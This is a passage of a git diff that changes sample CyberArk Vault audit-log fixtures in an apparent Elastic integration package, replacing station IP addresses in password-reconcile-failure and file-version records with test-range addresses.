defined\n","ExtraDetails":"address=67.43.156.15;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n 
Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=67.43.156.15;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 
60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 
2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=67.43.156.15;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} 
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/62_create_file_version.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/62_create_file_version.log
index 0d2f4d0e96e..4fefbe43db6 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/62_create_file_version.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/62_create_file_version.log
@@ -1,8 +1,8 @@ -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-11T16:50:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:29\n 2021-03-11T16:50:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PVWAAppUser\n Create File Version\n \n \n PSMSessions\n Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\n 10.0.1.20\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:29","IsoTimestamp":"2021-03-11T16:50:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PVWAAppUser","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.13\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-14T12:07:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:32\n 2021-03-14T12:07:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PasswordManager\n Create File Version\n \n \n AccountsFeedDiscoveryLogs\n Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\n 10.0.1.20\n \n \n \n \n \n Create File Version\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:32","IsoTimestamp":"2021-03-14T12:07:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PasswordManager","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"AccountsFeedDiscoveryLogs","File":"Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T12:57:27Z VAULT 